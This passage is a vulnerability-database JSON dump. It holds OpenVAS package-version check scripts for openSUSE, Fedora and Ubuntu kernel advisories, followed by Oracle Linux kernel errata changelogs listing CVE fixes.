rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools\", rpm:\"xen-xend-tools~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools-debuginfo\", rpm:\"xen-xend-tools-debuginfo~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae\", rpm:\"cloop-kmp-pae~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae-debuginfo\", rpm:\"cloop-kmp-pae-debuginfo~2.639_k3.12.62_52~11.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae\", rpm:\"crash-kmp-pae~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae-debuginfo\", rpm:\"crash-kmp-pae-debuginfo~7.0.2_k3.12.62_52~2.32.7\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k3.12.62_52~16.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae\", rpm:\"iscsitarget-kmp-pae~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae-debuginfo\", rpm:\"iscsitarget-kmp-pae-debuginfo~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae\", rpm:\"ndiswrapper-kmp-pae~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae-debuginfo\", rpm:\"ndiswrapper-kmp-pae-debuginfo~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-pae\", rpm:\"openvswitch-kmp-pae~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-pae-debuginfo\", rpm:\"openvswitch-kmp-pae-debuginfo~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-\", rpm:\"vhba-kmp-pae~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo-\", rpm:\"vhba-kmp-pae-debuginfo~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae\", rpm:\"virtualbox-guest-kmp-pae~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae-debuginfo\", rpm:\"virtualbox-guest-kmp-pae-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae\", rpm:\"virtualbox-host-kmp-pae~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae-debuginfo\", rpm:\"virtualbox-host-kmp-pae-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae\", rpm:\"xtables-addons-kmp-pae~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae-debuginfo\", rpm:\"xtables-addons-kmp-pae-debuginfo~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-5829", "CVE-2016-1237", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-10T00:00:00", "id": "OPENVAS:1361412562310808556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808556", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-73a733f4d9", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-73a733f4d9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808556\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-10 07:19:32 +0200 (Sun, 10 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5829\", \"CVE-2016-5728\", \"CVE-2016-1237\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-73a733f4d9\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-73a733f4d9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FVENSYS4VXRLKHNVGHP4I4USAPYJ2RFT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.5.7~202.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-11T00:00:00", "id": "OPENVAS:1361412562310842798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842798", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3008-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3008-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842798\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-11 05:28:15 +0200 (Sat, 11 Jun 2016)\");\n script_cve_id(\"CVE-2016-1583\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3008-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that eCryptfs improperly attempted to use the mmap()\nhandler of a lower filesystem that did not implement one, causing a\nrecursive page fault to occur. A local unprivileged attacker could use to\ncause a denial of service (system crash) or possibly execute arbitrary code\nwith administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3008-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3008-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1015-snapdragon\", ver:\"4.4.0-1015.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-11T00:00:00", "id": "OPENVAS:1361412562310842789", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842789", "type": "openvas", "title": "Ubuntu Update for linux USN-2999-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2999-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842789\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-11 05:26:11 +0200 (Sat, 11 Jun 2016)\");\n script_cve_id(\"CVE-2016-1583\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2999-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that eCryptfs improperly attempted to use the mmap()\nhandler of a lower filesystem that did not implement one, causing a\nrecursive page fault to occur. A local unprivileged attacker could use to\ncause a denial of service (system crash) or possibly execute arbitrary code\nwith administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2999-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2999-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-generic\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-generic-lpae\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-lowlatency\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-powerpc-e500\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-powerpc-e500mc\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-powerpc-smp\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-powerpc64-emb\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-88-powerpc64-smp\", ver:\"3.13.0-88.135\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0758", "CVE-2015-8767", "CVE-2016-4565"], "description": "- [3.10.0-327.22.2.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.22.2]\n- [infiniband] security: Restrict use of the write() interface (Don Dutile) [1332553 1316685] {CVE-2016-4565}\n[3.10.0-327.22.1]\n- [mm] mmu_notifier: fix memory corruption (Jerome Glisse) [1335727 1307042]\n- [misc] cxl: Increase timeout for detection of AFU mmio hang (Steve Best) [1335419 1329682]\n- [misc] cxl: Configure the PSL for two CAPI ports on POWER8NVL (Steve Best) [1336389 1278793]\n- [powerpc] Define PVR value for POWER8NVL processor (Steve Best) [1336389 1278793]\n- [x86] Mark Intel Knights Landing-F processor as not supported (Steve Best) [1335407 1331516]\n- [netdrv] ixgbevf: fix spoofed packets with random MAC (Ken Cox) [1335406 1247345]\n- [netdrv] ixgbevf: use ether_addr_copy instead of memcpy (Ken Cox) [1335406 1247345]\n- [scsi] hpsa: update rev to 3.4.10-0-RH3 (Joseph Szczypek) [1334773 1296287]\n- [scsi] hpsa: check for a null phys_disk pointer in ioaccel2 path (Joseph Szczypek) [1334773 1296287]\n- [cpufreq] intel_pstate: Fix divide by zero on Knights Landing (Steve Best) [1334438 1273305]\n- [mm] hugetlbfs: optimize when NUMA=n (Rui Wang) [1334436 1274624]\n- [mm] hugetlb: use memory policy when available (Rui Wang) [1334436 1274624]\n- [mm] optimize put_mems_allowed() usage (Rui Wang) [1334436 1274624]\n- [x86] Mark Intel Knights Landing processor as supported (Steve Best) [1332991 1158238]\n- [block] virtio-blk: use VIRTIO_BLK_F_WCE and VIRTIO_BLK_F_CONFIG_WCE in virtio1 (Fam Zheng) [1327611 1266008]\n- [x86] mm: suitable memory should go to ZONE_MOVABLE (Igor Mammedov) [1327588 1265880]\n- [mm] memory-hotplug: add zone_for_memory() for selecting zone for new memory (Igor Mammedov) [1327588 1265880]\n- [s390] mm: Fix memory hotplug for unaligned standby memory (Igor Mammedov) [1327588 1265880]\n- [mm] memory-hotplug: Remove 'weak' from memory_block_size_bytes() declaration (Igor Mammedov) [1327588 1265880]\n- [mm] Add prototype declaration to the header file (Igor Mammedov) [1327588 1265880]\n- [mm] hotplug: verify hotplug memory range (Igor Mammedov) [1327588 1265880]\n- [drm] vmwgfx: respect 'nomodeset' (Rob Clark) [1327587 1284936]\n- [net] sctp: Prevent soft lockup when sctp_accept() is called during a timeout event (Xin Long) [1324748 1270586] {CVE-2015-8767}\n- [net] sctp: Whitespace fix (Xin Long) [1324748 1270586] {CVE-2015-8767}\n- [fs] xfs: fix splice/direct-IO deadlock (Bill O'Donnell) [1324098 824796]\n- [fs] vfs: split generic splice code from i_mutex locking (Bill O'Donnell) [1324098 824796]\n- [lib] keys: Fix ASN.1 indefinite length object parsing (David Howells) [1308814 1308815] {CVE-2016-0758}\n[3.10.0-327.21.1]\n- [lib] klist: fix starting point removed bug in klist iterators (Ewan Milne) [1333403 1309433]\n- [acpi] tables: test the correct variable (Prarit Bhargava) [1331681 1242556]\n- [x86] acpi: Handle apic/x2apic entries in MADT in correct order (Prarit Bhargava) [1331681 1242556]\n- [acpi] tables: Add acpi_subtable_proc to ACPI table parsers (Prarit Bhargava) [1331681 1242556]\n- [acpi] table: Always count matched and successfully parsed entries (Prarit Bhargava) [1331681 1242556]\n- [acpi] table: Add new function to get table entries (Prarit Bhargava) [1331681 1242556]\n- [netdrv] mlx4_en: Fix IRQ affinity on s390x (Kamal Heib) [1327583 1264148]\n- [usb] xhci: Workaround to get Intel xHCI reset working more reliably (Torez Smith) [1327581 1318570]\n- [block] Return EBUSY from BLKRRPART for mounted whole-dev fs (Eric Sandeen) [1324530 1285549]\n- [powerpc] eeh: Fix PE location code (Gustavo Duarte) [1324528 1302537]\n- [powerpc] eeh: Wrong place to call pci_get_slot() (Steve Best) [1327834 1273996]\n- [net] ipv6: Nonlocal bind (Sabrina Dubroca) [1324502 1315968]\n- [net] ipv4: bind ip_nonlocal_bind to current netns (Sabrina Dubroca) [1324502 1315968]\n[3.10.0-327.20.1]\n- [kernel] audit: stop an old auditd being starved out by a new auditd (Richard Guy Briggs) [1328802 1253123]\n- [kernel] audit: try harder to send to auditd upon netlink failure (Richard Guy Briggs) [1328802 1253123]\n- [kernel] audit: remove stray newlines from audit_log_lost messages (Richard Guy Briggs) [1328802 1253123]\n- [kernel] audit: get rid of *NO* daemon at audit_pid=0 message (Richard Guy Briggs) [1328802 1253123]\n- [kernel] audit: prevent an older auditd shutdown from orphaning a newer auditd startup (Richard Guy Briggs) [1328802 1253123]\n- [net] netlink: don't hold mutex in rcu callback when releasing mmapd ring (Phil Sutter) [1328801 1238749]\n- [lib] rhashtable: Wait for RCU readers after final unzip work (Phil Sutter) [1328801 1238749]\n- [net] netlink: Lockless lookup with RCU grace period in socket release (Phil Sutter) [1328801 1238749]\n- [net] netlink: use jhash as hashfn for rhashtable (Phil Sutter) [1328801 1238749]\n[3.10.0-327.19.1]\n- [net] tcp, dccp: warn user for preferred ip_local_port_range (Florian Westphal) [1323960 1305525]\n- [net] tcp, dccp: try to not exhaust ip_local_port_range in connect() (Florian Westphal) [1323960 1305525]\n- [net] tcp: improve REUSEADDR/NOREUSEADDR cohabitation (Florian Westphal) [1323960 1305525]", "edition": 4, "modified": "2016-06-23T00:00:00", "published": "2016-06-23T00:00:00", "id": "ELSA-2016-1277", "href": "http://linux.oracle.com/errata/ELSA-2016-1277.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8660", "CVE-2016-2143", "CVE-2016-4470", "CVE-2016-4565"], "description": "[3.10.0-327.28.2.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.28.2]\n- [net] bridge: include in6.h in if_bridge.h for struct in6_addr (Jiri Benc) [1331285 1268057]\n- [net] inet: defines IPPROTO_* needed for module alias generation (Jiri Benc) [1331285 1268057]\n- [net] sync some IP headers with glibc (Jiri Benc) [1331285 1268057]\n[3.10.0-327.28.1]\n- [netdrv] e1000: Double Tx descriptors needed check for 82544 (Jarod Wilson) [1349448 1274170]\n- [netdrv] e1000: Do not overestimate descriptor counts in Tx pre-check (Jarod Wilson) [1349448 1274170]\n- [scsi] 3w-9xxx: version string touch (Tomas Henzl) [1348833 1322447]\n- [scsi] 3w-9xxx: don't unmap bounce buffered commands (Tomas Henzl) [1348833 1322447]\n- [scsi] 3w-9xxx: fix command completion race (Tomas Henzl) [1348833 1322447]\n- [fs] gfs2: don't set rgrp gl_object until it's inserted into rgrp tree (Robert S Peterson) [1348829 1344363]\n- [fs] fanotify: fix notification of groups with inode & mount marks (Miklos Szeredi) [1348828 1308393]\n- [fs] ovl: fix permission checking for setattr (Vivek Goyal) [1293980 1293981]\n- [security] keys: potential uninitialized variable (David Howells) [1345935 1341352] {CVE-2016-4470}\n- [tty] Invert tty_lock/ldisc_sem lock order (Herton R. Krzesinski) [1336823 1327403]\n- [tty] Don't hold tty_lock for ldisc release (Herton R. Krzesinski) [1336823 1327403]\n- [tty] Reset hupped state on open (Herton R. Krzesinski) [1336823 1327403]\n- [tty] Fix hangup race with TIOCSETD ioctl (Herton R. Krzesinski) [1336823 1327403]\n- [tty] Clarify ldisc variable (Herton R. Krzesinski) [1336823 1327403]\n- [infiniband] security: Restrict use of the write() interface (Don Dutile) [1332553 1316685] {CVE-2016-4565}\n[3.10.0-327.27.1]\n- [md] raid5: check_reshape() shouldn't call mddev_suspend (Jes Sorensen) [1344313 1312828]\n- [net] sctp: Potentially-Failed state should not be reached from unconfirmed state (Xin Long) [1347809 1333696]\n- [net] sctp: fix the transports round robin issue when init is retransmitted (Xin Long) [1347809 1333696]\n- [net] sctp: fix suboptimal edge-case on non-active active/retrans path selection (Xin Long) [1347809 1333696]\n- [net] sctp: spare unnecessary comparison in sctp_trans_elect_best (Xin Long) [1347809 1333696]\n- [net] sctp: improve sctp_select_active_and_retran_path selection (Xin Long) [1347809 1333696]\n- [net] sctp: migrate most recently used transport to ktime (Xin Long) [1347809 1333696]\n- [net] sctp: refactor active path selection (Xin Long) [1347809 1333696]\n- [net] sctp: remove NULL check in sctp_assoc_update_retran_path (Xin Long) [1347809 1333696]\n- [net] sctp: rework multihoming retransmission path selection to rfc4960 (Xin Long) [1347809 1333696]\n- [net] sctp: retran_path not set properly after transports recovering (Xin Long) [1347809 1333696]\n- [mm] memcg: fix endless loop caused by mem_cgroup_iter (Herton R. Krzesinski) [1344750 1297381]\n- [scsi] qla2xxx: Set relogin flag when we fail to queue login requests (Chad Dupuis) [1347344 1273080]\n- [x86] perf/x86/intel/uncore: Add Broadwell-EP uncore support (Jiri Olsa) [1347374 1259976]\n- [x86] perf/x86/intel/uncore: Add Broadwell-DE uncore support (Jiri Olsa) [1348063 1306834]\n- [lib] rhashtable: Do hashing inside of rhashtable_lookup_compare() (Phil Sutter) [1343639 1238749]\n- [s390] mm: four page table levels vs. fork (Hendrik Brueckner) [1341547 1308879] {CVE-2016-2143}\n- [firmware] dmi_scan: Fix UUID endianness for SMBIOS >= 2.6 (Prarit Bhargava) [1340118 1294461]\n- [misc] cxl: Export AFU error buffer via sysfs (Gustavo Duarte) [1343537 1275968]\n- [misc] cxl: Poll for outstanding IRQs when detaching a context (Alexander Gordeev) [1338886 1332487]\n- [misc] cxl: Keep IRQ mappings on context teardown 